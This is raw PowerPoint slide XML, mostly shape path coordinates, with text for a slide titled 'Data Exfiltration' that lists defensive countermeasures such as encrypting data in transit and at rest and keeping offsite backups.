                    <a:pt x="1065969" y="2744560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110987" y="2754556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156540" y="2763085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202601" y="2770122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249144" y="2775640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296144" y="2779614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343576" y="2782017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391412" y="2782823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439247" y="2782017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486679" y="2779614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533679" y="2775640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580222" y="2770122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626283" y="2763085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671836" y="2754556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716854" y="2744560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761311" y="2733122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805183" y="2720270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848442" y="2706029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891063" y="2690424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933021" y="2673482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974288" y="2655229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014840" y="2635690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054651" y="2614892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2093693" y="2592860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131943" y="2569620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169373" y="2545198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205957" y="2519620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241671" y="2492912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276488" y="2465100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2310381" y="2436209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343326" y="2406266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375296" y="2375296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406266" y="2343326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436209" y="2310381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465100" y="2276488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492912" y="2241671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519620" y="2205957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545198" y="2169373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2569620" y="2131943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592860" y="2093693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614892" y="2054651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635690" y="2014840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2655229" y="1974288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673482" y="1933021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690424" y="1891063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706029" y="1848442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2720270" y="1805183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2733122" y="1761311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744560" y="1716854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754556" y="1671836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2763085" y="1626283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770122" y="1580222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2775640" y="1533679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779614" y="1486679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782017" y="1439247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782824" y="1391411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782017" y="1343576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779614" y="1296144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2775640" y="1249144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770122" y="1202601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2763085" y="1156540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754556" y="1110987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744560" y="1065969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2733122" y="1021512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2720270" y="977640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706029" y="934381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690424" y="891760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673482" y="849802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2655229" y="808535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635690" y="767983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614892" y="728172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592860" y="689130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2569620" y="650880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545198" y="613450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519620" y="576866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492912" y="541152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465100" y="506335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436209" y="472442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406266" y="439497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375296" y="407527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343326" y="376557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2310381" y="346614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276488" y="317723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241671" y="289911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205957" y="263203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169373" y="237625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131943" y="213203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2093693" y="189963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054651" y="167931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014840" y="147133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974288" y="127594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933021" y="109341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891063" y="92399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848442" y="76794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805183" y="62553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761311" y="49701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716854" y="38263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671836" y="28267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626283" y="19738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580222" y="12701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533679" y="7183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486679" y="3209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439247" y="806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391412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575558" y="3294379"/>
              <a:ext cx="2290445" cy="4551680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4415256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4431141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4454241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2666" y="4482211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4509817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4532090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4546790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75945" y="4551680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4545355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4529470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4506370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4450794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4428521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4413821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="140239" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="88519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295655" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405256" y="110998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513206" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619125" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723138" y="184277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824864" y="218694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924178" y="257937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021206" y="301752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115694" y="350139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207389" y="402971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296162" y="459867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382140" y="520954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464817" y="585978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544319" y="654812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620392" y="727456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692909" y="803529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761616" y="882904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826640" y="965708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887727" y="1051560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944751" y="1140460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="1232154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="1326642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="1423670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="1523111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="1624965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="1728851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217166" y="1834769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="1942592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2052320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2163445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2261616" y="2276221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2388870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2499995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="2609469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217039" y="2717292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="2823210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="2926969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="3028696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="3128010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="3225038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="3319399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944877" y="3411093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887981" y="3499866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826894" y="3585718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761997" y="3668395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693290" y="3747770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620774" y="3823843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544827" y="3896360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465452" y="3965321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382776" y="4030218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="4091305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208277" y="4148201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116711" y="4201033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022350" y="4249420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925449" y="4293235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="4332478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724407" y="4367022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620521" y="4396613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514730" y="4421124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407034" y="4440555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297433" y="4454525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186308" y="4463161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188467" y="4491609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300989" y="4482846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411988" y="4468622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521080" y="4448937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628395" y="4424172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733551" y="4394073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836549" y="4359148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937132" y="4319270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035303" y="4274820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130934" y="4225798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223771" y="4172331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313561" y="4114546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400428" y="4052697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484121" y="3986784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564513" y="3917061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641475" y="3843655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714880" y="3766566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784477" y="3686048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850136" y="3602228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911984" y="3515360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969642" y="3425317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022855" y="3332353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071751" y="3236849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116201" y="3138551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155825" y="3037840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190622" y="2934843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220467" y="2829560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245232" y="2722245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="2613152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278761" y="2502154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2389505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290064" y="2275459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2161286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278633" y="2048637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264409" y="1937639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244979" y="1828419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220087" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190368" y="1615694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155443" y="1512570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115566" y="1411859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071242" y="1313561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022220" y="1217930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968753" y="1125093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911095" y="1035050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849119" y="948055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783206" y="864235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713483" y="783844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640077" y="706755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562989" y="633222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482470" y="563499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398651" y="497713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311655" y="435864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221613" y="378206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128649" y="324739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033017" y="275717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934719" y="231394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833881" y="191516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730884" y="156845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625475" y="126873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518159" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408939" y="82677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297814" y="68453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185165" y="59944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="73151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69595" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73151" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="71754" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="139943" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="5715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575810" y="349376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575810" y="349376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575810" y="7198614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575810" y="7198614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487161" y="457580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487161" y="457580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468873" y="609523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468873" y="609523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644131" y="306451"/>
            <a:ext cx="296735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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-190">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exfiltration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206876" y="1933193"/>
            <a:ext cx="983742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Ordinary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countermeasures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exfiltration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includes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following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features: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9528" y="760476"/>
            <a:ext cx="4102608" cy="36575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5324094" y="3439414"/>
            <a:ext cx="8062595" cy="15017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30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ensures</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>confidential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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44484E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0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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>transit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484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14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at</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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rest</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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44484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9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encrypted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100">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="563880">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Builds</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484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2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>maintains</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>offsite</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>backup</a:t>
            </a:r>
            <a:r>
